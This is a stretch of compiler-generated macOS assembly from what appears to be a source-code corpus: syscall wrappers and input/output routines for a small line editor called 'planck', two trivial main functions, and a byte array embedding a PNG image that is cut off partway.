%rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movslq -4(%rbp), %rsi movq -16(%rbp), %rdx movq -24(%rbp), %rcx movl $3, %edi xorl %eax, %eax movl %eax, %r9d movq %r9, %r8 callq __syscall addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function dputi _dputi: ## @dputi .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl $0, -20(%rbp) LBB6_1: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax movl $10, %ecx cltd idivl %ecx addl $48, %edx movb %dl, %cl movl -20(%rbp), %eax movl %eax, %edx addl $1, %edx movl %edx, -20(%rbp) cltq movb %cl, -13(%rbp,%rax) ## %bb.2: ## in Loop: Header=BB6_1 Depth=1 movl -4(%rbp), %eax movl $10, %ecx cltd idivl %ecx movl %eax, -4(%rbp) cmpl $0, %eax jg LBB6_1 ## %bb.3: movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) LBB6_4: ## =>This Inner Loop Header: Depth=1 cmpl $0, -20(%rbp) jl LBB6_7 ## %bb.5: ## in Loop: Header=BB6_4 Depth=1 movl -8(%rbp), %edi movslq -20(%rbp), %rax leaq -13(%rbp), %rsi addq %rax, %rsi movl $1, %edx callq _write ## %bb.6: ## in Loop: Header=BB6_4 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) jmp LBB6_4 LBB6_7: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function close _close: ## @close .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movslq -4(%rbp), %rsi movl $6, %edi xorl %eax, %eax movl %eax, %r9d movq %r9, %rdx movq %r9, %rcx movq %r9, %r8 callq __syscall addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function dgeti _dgeti: ## @dgeti .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movl %edx, -24(%rbp) movl $0, -32(%rbp) movl $0, -28(%rbp) LBB8_1: ## =>This Inner Loop Header: Depth=1 movl -28(%rbp), %eax movl -20(%rbp), %ecx subl $1, %ecx cmpl %ecx, %eax jge LBB8_11 ## %bb.2: ## in Loop: Header=BB8_1 Depth=1 movl -24(%rbp), %edi movq -16(%rbp), %rsi movslq -28(%rbp), %rax addq %rax, %rsi movl $1, %edx callq _read cmpq $1, %rax jge LBB8_4 ## %bb.3: movl $0, -4(%rbp) jmp LBB8_20 LBB8_4: ## in Loop: Header=BB8_1 Depth=1 movq -16(%rbp), %rax movslq -28(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $10, %eax jne LBB8_6 ## %bb.5: jmp LBB8_11 LBB8_6: ## in Loop: Header=BB8_1 Depth=1 movq -16(%rbp), %rax movslq -28(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $48, %eax jl LBB8_8 ## %bb.7: ## in Loop: Header=BB8_1 Depth=1 movq -16(%rbp), %rax movslq -28(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $57, %eax jle LBB8_9 LBB8_8: ## in Loop: Header=BB8_1 Depth=1 movl $1, -32(%rbp) LBB8_9: ## in Loop: Header=BB8_1 Depth=1 jmp LBB8_10 LBB8_10: ## in Loop: Header=BB8_1 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB8_1 LBB8_11: movq -16(%rbp), %rax movslq -28(%rbp), %rcx movb $0, (%rax,%rcx) movq -16(%rbp), %rax movsbl (%rax), %eax cmpl $0, %eax jne LBB8_13 ## %bb.12: movl $0, -4(%rbp) jmp LBB8_20 LBB8_13: cmpl $1, -32(%rbp) jne LBB8_15 ## %bb.14: movl $1025, -4(%rbp) ## imm = 0x401 jmp LBB8_20 LBB8_15: movl $0, -32(%rbp) movl $0, -28(%rbp) LBB8_16: ## =>This Inner Loop Header: Depth=1 movslq -28(%rbp), %rax movq %rax, -40(%rbp) ## 8-byte Spill movq -16(%rbp), %rdi callq _strlen movq %rax, %rcx movq -40(%rbp), %rax ## 8-byte Reload cmpq %rcx, %rax jae LBB8_19 ## %bb.17: ## in Loop: Header=BB8_16 Depth=1 imull $10, -32(%rbp), %eax movq -16(%rbp), %rcx movslq -28(%rbp), %rdx movsbl (%rcx,%rdx), %ecx subl $48, %ecx addl %ecx, %eax movl %eax, -32(%rbp) ## %bb.18: ## in Loop: Header=BB8_16 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB8_16 LBB8_19: movl -32(%rbp), %eax movl %eax, -4(%rbp) LBB8_20: movl -4(%rbp), %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function dgets _dgets: ## @dgets .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movl %edx, -24(%rbp) movl $0, -28(%rbp) LBB9_1: ## =>This Inner Loop Header: Depth=1 movl -28(%rbp), %eax movl -20(%rbp), %ecx subl $1, %ecx cmpl %ecx, %eax jge LBB9_8 ## %bb.2: ## in Loop: Header=BB9_1 Depth=1 movl -24(%rbp), %edi movq -16(%rbp), %rsi movslq -28(%rbp), %rax addq %rax, %rsi movl $1, %edx callq _read cmpq $1, %rax jge LBB9_4 ## %bb.3: movl $0, -4(%rbp) jmp LBB9_9 LBB9_4: ## in Loop: Header=BB9_1 Depth=1 movq -16(%rbp), %rax movslq -28(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $10, %eax jne LBB9_6 ## %bb.5: jmp LBB9_8 LBB9_6: ## in Loop: Header=BB9_1 Depth=1 jmp LBB9_7 LBB9_7: ## in Loop: Header=BB9_1 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB9_1 LBB9_8: movq -16(%rbp), %rax movslq -28(%rbp), %rcx movb $0, (%rax,%rcx) movq -16(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) LBB9_9: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function write _write: ## @write .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movslq -4(%rbp), %rsi movq -16(%rbp), %rdx movq -24(%rbp), %rcx movl $4, %edi xorl %eax, %eax movl %eax, %r9d movq %r9, %r8 callq __syscall addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "usage: " L_.str.1: ## @.str.1 .asciz " [file]\n" L_.str.2: ## @.str.2 .asciz "planck: error: cannot open " L_.str.3: ## @.str.3 .asciz "\n" L_.str.4: ## @.str.4 .asciz "plank: error: line " L_.str.5: ## @.str.5 .asciz " is longer than 127 characters\n" L_.str.6: ## @.str.6 .asciz "plank: error: " L_.str.7: ## @.str.7 .asciz " is greater than 1024 lines\n" L_.str.8: ## @.str.8 .asciz "planck: error: could not close " L_.str.9: ## @.str.9 .asciz "line: " L_.str.10: ## @.str.10 .asciz "?\n" L_.str.11: ## @.str.11 .asciz "command: " L_.str.12: ## @.str.12 .asciz "planck: error: cannot add line, already at limit\n" L_.str.13: ## @.str.13 .asciz " " L_.str.14: ## @.str.14 .asciz "File: " L_.str.15: ## @.str.15 .asciz "planck: error: could not open " .subsections_via_symbols
the_stack_data/168891877.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str wzr, [sp, #12] mov w0, #55 add sp, sp, #16 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, -4(%rbp) movl $55, %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/140765750.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__const .globl _mch2021_other_half_png ; @mch2021_other_half_png _mch2021_other_half_png: .ascii "\211PNG\r\n\032\n\000\000\000\rIHDR\000\000\000\240\000\000\000\360\b\003\000\000\000\260\237\237\350\000\000P\224zTXtRaw profile type exif\000\000x\332\255\235i\262\355\270\255\245\377k\024\036\202\330I\344p\330)\242fP\303\257\357\343\276N7\357E=WD9\335\244o\236\263\267D\002\013k\201\000x\355\377\375\277\276\353o\177\373[x\337\026\257\\\336\372\264\347\271\371Wn\271\305\316\337\324\373\037\377\332\177\376\367\367g\341\316\347\277\317\277z\377\363\317\302\035\256\177\376\007\177\375]\344\177\023\377\233~\177\370\346?\3774\375\371\363\277\377\374\363\327\377\362A\377\315?\b\345\337~!\375\3655\361\237\277\370\375\373\023\305;\376\333\023\345r\377\363\277\352?\376\363}\253~\337\376\275]\317\017\313\360\374^\352\367\025\327\337?\206\037\034|P:\277\366\360\327\313\177\n\177\377\236\277\032\177\325\273\3373\344{\335\363\036\3745C\0131\244\373\0139\254+\364\360\205\035\026\377;\303\344\031s\334\361\345\177c\2341\235?\253\351\215-\316t\247\220\262\177\205/\276\251\245\225j\212i\306\235R\312W\212\177=K8\337\333\316\367\315P\371\346\025\370\321\030\370\260\300\257\374_\377\272\376\247\037\370O\376\372\276y\263F!\360\366\341\217]\360\\1\272\017\301eL\3767?\306\206\204\357\317\276\225\263\300\177\377\353\257\177]\377\264\261\211\035,g\231+/\330\357\361\373\210Q\302?l+\035\003H\374\\\341\177\177\366\025\336\345\256\305c%\231\357.<LHl\301\375\204T\302\023\3567\3067\204\234be\203:O\036S\216\203\035\b\245\304\305C\306\234\322\303\336T\354\210\357\346w\336p~6\226\370\373s\\\205\375)\351I/{\323Rg\263r.\330\317\233+6\324K*\271\224\362\224\267\324\322J\277\236\364\344\247<\317\363>\372\\\177\323\233\337\362>\357\373\326\267\275\275\246\232k\251O}k\255\255\366\026[\302%K{\332\333jk\255w\276\263\347\253\227\316ow~\242\367\021G\032y\224\361\214w\324\321F\237\230\317\314\263\314g\276\263\3166\373\212+\255\274\312z\326\273\352j\253\357\2601\245k\347]\366\263\337]w\333\375\303\326\276\364\345\257|\317\367~\365k_\377k\327\302\037\267\375\367\277\376\037v-\374\331\265xv\312\237{\377\3325\376\364}\375\240\363\021A\234)\356\031;\026s`\307_w\000\203\216\356\331]C\316\321\235s\317\356\026\361\212\022y\310\342\336\254p\367+<la\336!\226/\374\265w\377\330\271\377x\337.\326\372\177\332\267\370\237\354\334\345\326\375\177\330\271x\355\364o\373\366\337\354\332\022\t\347\331\261\237\027\272\246w\302\373\370\270\020w\323i\331\326/\274\345^\317l\337^\367\230\254\320xAC\020n\247\372\365\267|\353\345\3633\337\373\254=G~\327\373\340\002i\3541[)/\bP.^\344+i\257\266\237\261\302\313\317~\265\260\355\005xk=\361~\267\000\226\205\265Uw\231:\351\340\273\352=\374\321w\247w\244V\257\274\236\357\251ljM=\3059c\337\375\t\374\356xs\357/\017\267\006K1|\302\326\326\227y\255\220\367\207\327\276_kq\215\257\336_n\327XOJw\353\357(%\205*\302\326\331[\332\243\315\365\206\267\367\247~\357\333\213o\366\262g9\207\352\203\b\005i\342\036~\302L\327\332\367d\221\326\030e\016\366\356\031\333\227_\261\256\375\334\3402/W\236^\366[Y\312\310\242`d-\345\3178\320\326\354\230\005\253\374\261k\354\353\340\365[\307(\261\204\260\237<0\003V\240\357o\027\377\031\333\031z\237o\333\t\353xW\312\353\376\356\314w\360r\263\357\035\306\305/\020#\214\0051g\026\247b\305\241\354\266vj\243\3241\037>\0040\373B[u>lK\272{\255\317\307\023\354\236\226k\207%\340\"}\225\321\277\372\224^\237\276\036\f\222\007Jq\365B\374\252Y\017\340\243\327H\265\217\365\335\354\270{\013\272\362Y\273\317T\312`\031\306\225\337\3017\365<\373\243O\343m\223\365\033<G\004O\313\234;a\3128\315\267\337\225\367\r\322\324\031Y\302\331Rj\033\003\b\235\317\332\027+9\336\304\177\336\360<s\257\256\323\247\021\000\246\366\003\217o\026\354\261\263*\241}\265\356\230\360\302\2017\026\360\346\273\023k_\236u=\335\237\346\307y\347U\366H\373n+\263\237\304\371\367=\226\016l\264X\006\366\300\316\362\210;\024w\202O\017_\345\205\336\366\344\357\372\356\306\202\016\202A\331\330;.1\362\274\327\213WN\302w\347WZ_\341\331{\361\b\230\347\032,k\234\245g\354\221\005\216#&\336\363\332\304\361\321r]\300H\030F?P\200\215\031\355\003\013k\007@\240/8\327d\245k\232\376X\033w\235\365{Zf\037\322\016\367W\347\225\361\366\207\025\371\326\267\330v\b\013\210\225\007\257]\353,+\003\004|F\031\330\315Z}b\0138\317\210\255l\000\216E\230\330m|s\271\336\357K\253w\f\367\306\224\342\312#/\376k\336\241\317o\002O{\277\203o[E+aQ\276\210\373\224\347\303\337\356\370\325\261\371\261\260\336\013h\336`\364\3407\356\231\352\241Ox\333\227r\303[\302\340w\027\237}\317\231r\035\005\277~\2405x\0310\360\201\355\245\315\027hY\027\020\226ym\300\031 \376\342\323A\245{n02,\236\346\313q\335\374H\031\225=\373\346\340\213c\250+\201\267\001/csv\372\370\274ka\314\255\217\311\232\001y\373\341sx>\r?\261\364c\214\316\232\224\257\225X\032o\237\372\033\260\321Q0%^,?\213Oa\t\363\345\257\340\255\373\367\313`3\216\0177\300V\371\241\247\311\331\360\007\276i\357\362\335\317[\307\363\214\261\f\017@z*8d\032\355I\327\000\360\330vP\357\356\223\360\363~\363c\037\362\232\254<\306\243\035~\031\260y0\246\\\303,\203\367\203\217OP\t<}b2p\304KW'\350\004\243\017x\017\337Kk\314\312>\020\005\237\326\t\004\017O\002\370\202p|\022\037\223q\270\225\353[\264%\367\251\247\017\2505\324<\213'aO\301\252\211\213V0\246d\336e\363\366`\024\377\b7\307\264\372\tB\330\364\376R#\320\256\215\321m\036\350\316l?\366\316c\361\215\215 \361\324\275\357\r\035\336\013\317\006\313Vz\313\256\337\214\240<\324\227\020\212\023\023H\"\370Hh\356\320\260\217@\372]\3150\3037`3\353\351\300\341W\352\356\001\314m\200r[\017\301\350\353\025\232\200\233\277\354t\237\262\213\232\001%\200\313\300\364V\236\374\202\302=\245%`\036\222\203\242\301\365*0\337\337\233\320#\364\342\r+\267\367\313c\227\225\366CD\006\334\"p\003\303\302C\201\324\035\333w\325g\033r4\210\231\301(\036\017\300/x/!\032\202=\001\n\336\352\203t\023\215\247\200\375\360A\351\325+\211!\000E\271gy.6\017\b!&4\342s\373\002\026\302k}\230)\376\317O\325\210\257\275\230jz*\001`\004\240\003\332Q\210h\270\355\215( t\342&\327\212m\020\377A\260R~\200\206zac\026Dc\205\306\216\356\210[\315\357\215\017\301%\367@\030\307\373\331\310\027\367z\371\f>\177=Wm\307\242\023\256;\260\247\257\227O\237(\255?\317\302\353\343\215\001\217w\016\366\212\340DX\236\241\023\375\021q\3540l\351\333`\204O\324\0015\224\307\227X\034\f\220\367!8\tr\365\315#d\210Tjw\316\023\356\206\363\021&\007\333Uad>@G\347`\032\243>\327x|2\202;\250\312\342<\253\343\342\320\nl\206\355\353w\003\224\203\350\237]\353\262\260uP%\360s\204\315\257w\tG{\363\276\n\313\220\330k^?l\202\021\001\211\250\321:!\262\303n 5\300\345\207\337\301\275\360\213\361$\314\007xD\013\206\375A\017\260\261\n\326\\\r\227\371np\022'\205TA\320\330\251\2338^zL\003stO\302\374\370\264%\n4\254\260=\276V\216\005\036\n\313\346k\346\272J\355\271\215\314g\363\250\013\223\"2>\235H\370\301\336\300\247\027&C\270\3044\352\212\035I9\001\rH\025\321\034\344\032\t\377\355\360C\200\rd\341\241\371\271Z\b\275\037\230\200\205\021C38\364\021u;\177\264\370p\276\215g\225\377\354\321\361\2624@\t\270d\nXA\231Wy%\177S\225\363\354'\020\370AV\002=XQ\211X\2174h|o\207i\002\274\330\022\334sc\034\031$\232\230\304\r4\201w\353b\353t6H\0268Y\340.\004\302\005Z7\034\005\376\001\276\347\215\321\301\210\347\373\200\030\220\347\000\035`O\t\221\343\346\245;\0246\275\027\024\276Ah\032\313\013uX\363\203&I\255\364+\036\005\240\n\360\207\b\f\270,\373Y\306\221\364\020\205\207~\r}\237o\236!]\025B<\026\234u5\336t\025\231\007\361\207\r\345\2431\274\360\036\326\214\267\005\367\332U\300\f6[\220\t%0\357\220|\262\357\302B\300\246\265x\271\217\035\202s\300\263g?\304\206w\300\031&.Bp\035o\037\211\007\376\364I<\035^\267`K\033(\310p\253\353\3050\025's\0313\bp\332+\237\302n<,#\177\327\370c\000\243\361k\231p9+p\036\200\220c\257{\022\332F\336\3752\322\020\340sd%yW\361\003H\252\017\217=y\223\005\267\305\000q\276\342*\263\362\235=J\241\335\354\376\032D\233\027\267\205\340]\350\334\250\002\234\013g\305X\200\330\375\300@o\354\356&\202\364]\372\320\276\020\032s\004(P$\332\017\326\264\372\r\001\361\204\306\373\312\325\"\334\000\203\217\211\030\304\303a{\346(`\252\375\221m\261\b\371\004Qb\005\257B\314\211\001\244\302j\223y\203\321XQ\326\340\273R\006\313\241\223 \340\203\335f\374\247@*\016v\274D?,\341\341\363 a\310\032\2153\260\334<9j\f\350\201\207,8e\277\367\025\t\321Y@'\272\343\001\017\373\234\330(@\r\002Q\326\334\220{8 \277\bj\275\222\375\375F\202\204{O\314\203\332\227\207\377\023.@\f@J\322jC\177C\352\260\250\203\320w\217\364AK3\364\"bm\"(\370\002F\350\371\032\341\364+\001\266\255\001_8b\352\261J\226\210\2140\351\200\b\214\365&\276\355;6\336\027\336\265\331\177,\361\333\310G\374\b\203\201\275\020\353\340\303m6\274\257E\"-\257\374\212\326\320Z\320\225\247\270w{ax\376@W\034\342\272_\\\220+\244G\2234G@\007\020\025\276xF\342*\222\355\"\0004|\025\277\303\220\341|\360\024\220)K\215E\340\006\264\027\340\226\257\356\023\245\f\270n\342\234\306Z0}\326\0248`1\342538\222\3569\3707\301\017\347\305O\366n\r\252\n\365\210\362\371\241\314\250X\023\324\255\326\227\0057\025\300+\026bQ;L\263\022\327F\0048\342\316\335\355$Zu4\024{K\034\3407P10S\334\036$\032QJ\002Z=\031\334\300}!\245Hwh>\277\177\241\021p\212\372\214\357\374>\246\205\030\035\r^\215.\004\265\3403\243\362p\354m\300\305\334i\270E\216Ps,\375[\263\020\nYv\354h\243\000\220\267\374\000\316\3250\004\364\037\252\236w\207\226\226\331+\373T;o\215\363T~\002\333!tM\250\200\261\021:G\360\034\337\025nQ\366k\373-\255\315\033\321\210\276\000\262\233\302\b\341\230\022\314\005\265\026\200\23756.\337{\013\271\347\250\bx\"\230\214\t\202\331p\021\3141\000<,&\016\207]\"\366\241\276\215\325\345\301jS7\241v*\304\263 $a\313,\235|\001\375z>_e\316\366\263\207\200\306\206\344V\365=?\003+\303\017\276B(\033\254%\212\003\003\300>!\006\300\022\312\031\367(\265\230\202\340\305N\256\240 !V\207/'x\035\206\316\013\021\353Y\035\320\301\234F\314;\201%\372\217o\013\337U\251W\236\2227\346o\222\361\027l!@]\220\236$\240\215\224Q\002C\312qG<\242k\314\265\021.\241-P\275\212P\300axB\334\357\203\273@\332\300\332\026\3646l\350\222\332BsJ\314\230\001\277\363\"\370q=\366ce\227\030*\200?\300\036\356\200\355\361\314\210\000<V\031\325x\243\334\340\342\272\361\225\361\007V\271\035\2777G\203\372\341\025$\202\254\"\212\2108~\303\251\307*\362\242T\013\256\306+\343\301\357O-\000W|\0052+\204\005 `\"\005\016\203\301\230YP2C\374\b\026o\"\bB\025p\355\272\t\345!=x8A\032\254)\250\022^\372\343!\332\025\210\362\013\344O\357 \324\016\201\004\225\n\361\207\267\0230\0211\354K\370\210$\2379\027V<\361\005\304pd\315\367\276\273>\363\253\200\024N\353\323\003\362\2606>\031\242\201\032\235(\237\234qQ\266\033'\226\271\263;\245\342p\273N\034\005\241\204X\032a\202\211\337\301\364\313\265F\362\360\251 \002\314\026hy\370Z\231\036a\343a\233\023[h\030\204\317\302\016Al\004(l\nE\023o\266\022\247yJ\214\027\006\2168\032\235\320\201.\202f\343L\017\217\006\027\352\021b\n\225\346\213tt\264\360\203\002\005\306\241\233\022Xp\003\257|7v\235+\341\350n0\3055\314,\3027\020\035]\261n8\000\244AV\214\016\202\224\363\203\323\243-S'\226,\242\r\240A\274I/oD\024\273\244\200\017\320\016\301\030\220v\355\346\361\347al\300E\227HJ1\324\266\374&\301\304\344\027V\215\214\026\216\t\271|?\354\361\"\224B\251\001\006\350\007OI\030\352o\254\351{\336\250\332\304\345o~\371~\000\301a\200\b\321\000\201\274\355\022\263,\200\"*\322s)\252:\"\022\035\376\367\004\005z\2148\212X\333\323\354\303M\210F\300a\334\213\270\330$m(\366X\371\207\037~<\027D\203p\024\\\362M\330/\241b\215\201@^\016\225=\314\025n\202\327\003y\272\020\330\262Of\0245l\036\213\320t\3632\337\304\211\366\305\326B\367\032\204\211\347\200 t3co\003i\332I!A\274\315\022a\246\257\222EQ\t#/\353y3\352\f\207[<\376\312\330\321\234\003\244\273\023\206\005\310\315jX\202Oa\272\350\263^f\362\3233\036\006u\"\256\035W\207\006\342Zl>\201\351\223:\214ua\257F\357\334\360\376\367\206A\f\031\023\030\210\242\204\303 \207T(\254\0256e\262!\271\033'W\007\270c\311\3138\311\273]\004l\375\2248\215\363\016\0249\321s`1\351\3562~\324\"\f\216\340A\370\001\344V\324&\314\220>\221\337\271MgI\267\236p!\203\b\355\352\017m%\002o\231 \233\020N\362\275\264\017\003\rm`\323<\365}l\272\020\230\364,vDe\313\223\326\005\365c1\341\243P\2416\340\222\013|\271!\305yk\261l\027\244u\215Z0\301\242\024\002\251\342\007c\341-\"\312\034\002\313\037\303\354/\302\361\315/`\013\035\006\203\361\362\3057\3269$y\271\tcF\346\370\t\217\200/\013*\356BR\330\337\036\020\202\250\335\205\360\343W\223\370\300j\300a\327\215\023c\204x\326\346\353\003$\013\325\316f~\222\301\217\367C\"\372\275\370i\341G+z\005(\000\024\2561\347\221\327\013Lb\255\215\357\030Y\203l/\b\f\250\021Se\r\t\315,\232\016\200\223\230\026-\360P}\006\311Y\300\037\242\b\261\006\210\354\323\217\232r?\376]\tQ&\374\261v\036\315\023!\344l\251>\337\027\236)\362\362\277QU\224\353\344\355^\210\0261\b.9M\205\300\344\020\375\306\310\246B\232\354\001\030Il\320%\276\233\337\271\t]\357\255\244\205\252?\n:XZ\231\304\216\353\t\322\360\023\336#:\306t\030\336\035Z{Vx_\211\367\036&\274\221\313,`2\033\203v\007\236\240\277,(X7L\311\245\013H\005\227<=+\320\311\302s\325\223\241\202\332\245U\023+\377\207W\3405\346y\371bs\233\3766{\232\201+s(\357}\311\352\300v\002\000\016\230P\001\265\344\b6/\2639\235O\000H7\270M4\326t\345\031\257\321!\241s\277\206\335\251\204\314\326LpSJ\350\031\205y\n\366~\201\021[!\221g\323\206n\244\007\233\f\000\0273p\204\0034\261\364\020KB\300a\004on\027\177zCjZ\n\333\274\002! \303\241xs\240\026&\373l%\025x\2363\261r\242\1770\177|\277\263\336 \221\341m\202\277%\\\031]Q_<\341\365\334\"\375\016\tx\312\006\003\000\305:\252\032l\006\345P\357\036\022\230\321\026\007=_e\265\362\200\245\001%\373j\304\223\302\257\355\0270\274\345R\204[\335uz\f\304{\200\f@X\r\006@\002\303\202&a\030\005\177\304\261\001Ct\267R\357\302\354\037\2639\370~\204\241\261\364\303\217\344\365\330)\376\007Z\315\373\231;\"2\274\004\002b\034Ah\"*\036\330A\315\275\361\0063\253\373\001\326\202N{\301> j\337<\013A \242r:\352\002t\222a\f5\313f\025x]4\013t|U\310d\302W\260\274\264.\334\001\277\202\307\214%\031\212\305\2045>e\342\f\013\340\003\241\204\025\276\217\374HR\r\363\231\367LY\006\210\325\004\354c\202\342\327\021\320<\277G=\2210OL\005yX\000\220\264Cx\331z\320\356d\030\213g\334\367I -X\334f\027o\364o4\366\244\253y\262\"\315\273\315\355\206\333\3635\370g\277+\334=@\202\375\345[C\214\357\360hK\020_\304\333\216\256!\234Bk\201i\b\373\r\\UOf\026\2562\016%?\247I|\f\370\310+\213\262[\022\001\022\263\232\365\203|t\355\016H\307\217\240\bDT\323\207\230\t\021W\342\300C\017\351\201\372\347\335\030c\232\003\220@@\342\t\320Zl\030\023\306\345\360\033\254\3775\021\017}\202\357\017\350q\r\257l\021x7R\365\210W'#\320w\207\252\370\2560xL\007\377\006l\267n\211\263@\275\020\202\267\334s\232yBU j\240\273\004q>\002\252\215D\f\237\351\316a\352\020\307\n\374\363B\344\016'\031\201\312\016\343\205\332\274\212\0240W\261n\276\276?\327w\237li\035\204(\340\204\347D\370\206\033\021\201v\000Z\206\234\214-\307\263\b\310)\302\3425~ao\260\356<\303\270\037\026\362\002\0312\030G\350\323\033\315\266\201q\363\225\345\353\354\235_\222\325F\200\224\b!\221b\3111M\210\033d\030v\304Vtv\024\030\341\217YR\200wd>\023\354\031\003\017\362p\006l\254R\370&x\262`\0356AL0\206W\244\007\313O\334\207\016\030\022\316\321!b \276\222^3\213w\202\371\344dVMJ\177\0165\037v\271\242\234\312\201:\002\023|\255\317z\262\254\001\215\027\243Q\304\324lNJ\n\364\335k\032m\337l\003\330\020\3209\304\025\243'\266\006e.\321\314\247&\361\026\342\005_\257\374\200\267\301F\2261\030\031\201\335\324\345!\0232\177\235-\033w\341EU(\240\177H\021\276\204\253m\"\202\tZ\263n\304f9\223\351\256\3472O\t\337C\250\241\330L\322\273P\371ANH\316\261RO\364\006A\020\211\201e}\207o\213,#\340\037\267\351\235\263$\027\341\0201\224\365\"d\326F\356\245}\023\343\313\b\2328B\007\357E\370\346R\263\024\017Z\030\370\300\206F\235o\3322\004\234\373\273\257e\024\n\304f(\005\020\032\306]\001%~8\363\225K{\001U\021\224\346\003\240-\337\363$\017\026\"\230\365T\260mN(\023\004\373B\316\3412\370a\304\275\210\320\346\330\301\360\245\031\361\377\341\003Pr\020\217(\n\335\b\304\"\276\n\003\256\240E)\226'=\367\367\356\367\342\367\007\\\030\360B\013A}\361&\300Xa5\020P\310!hG\030|\321\342\305_^\371\226X\237\343\221e\322'\022\337\032\264\371R\360a\201\030\333\207\250\230'K\215{\362S\351C\330\347\363hsUD\021,\225E4\207\t\273+\210^\354\013\311\022Qr\320\343Y\276\225\343\222%\342\274\340+\360^o\036\017y@\200GN\261\305\304\003\334\210ec\037\370\351l\312\001Z\000\324\302\277\237\370<\304~\3707\252\217\307i\236A*\034\320\017\360c\036\213\210\305>\000J\312>\274\371\365\224\227\227\313 \017(\345wA\357L\221'\204_;!1\262*\346\313<x\205[yJ\313\366\003R\022\364\204\025!\371\327Jha=\000\261P6+\350\211r\363\364\217\235\276*\036\363x0\b\356B-\314\265\023P_\026*\232\370B\215\213O\236b\303\220N~\360Ab\303\352\360%\217IB\360\250\024z\314\346\243\004\017\351-\230\331h'|v\217\213\210!\374h\207{\304D\244{4\252\027\310\304O\fe\220\211s^\204\227\340\227\227\007H\"!\333\262+\0170\302!\"\017\336\362\342/\r\355\213\023.\305\245iC\230$O\203\222\345\377\362\317\210?_\200\303\266y}:)\272t\202\230D<P\245\310\\\340\366\300\006[\306?\306\030\t*\232+1\357\271\025\370\346\214*BW\022\353q\361\213\314\352,;;\375\232#\223S\363|8\261\371Z}\250>f\263x\031\200\030\036\000\f\243Q1(\237\r!\020%O\230\030<\233\227Dk\022f\323hit^\201\357\203q\361\201\241\037\376\037\253\034\257\300(\371\212'\202O\221p?\371*L\030\342\307\277S\252\227\351b,:\201\2679\211\362\222]7\203G\232\304'8hf\207`\037\200\273H\345\221\224\032\3735C\017\306A\252\374V\213\275:{k\346\021\033\354M\031\013\371\371F}L\377e^S\326?\353:\231\302\217%A\024\274\240M0\223S\237\371|,\375\272\"\274\205\000\360\032\257>\217\261\254\004j\204\256\206\260<\025$\230\331\215a\231s1\351\025+N\022\343\357\214\331\372\2567\033\232/\250;O\272<n\255\277Z\006\360\025\304\342\237\002\230\0372\b0\202\345 .\210\026\267\031T\214\253\2344\006\366\364\374R\324\025\360\347\371\237\026O\000h\360\220i\325\016\016\215\f\345\363Z\325R\005\026\3645 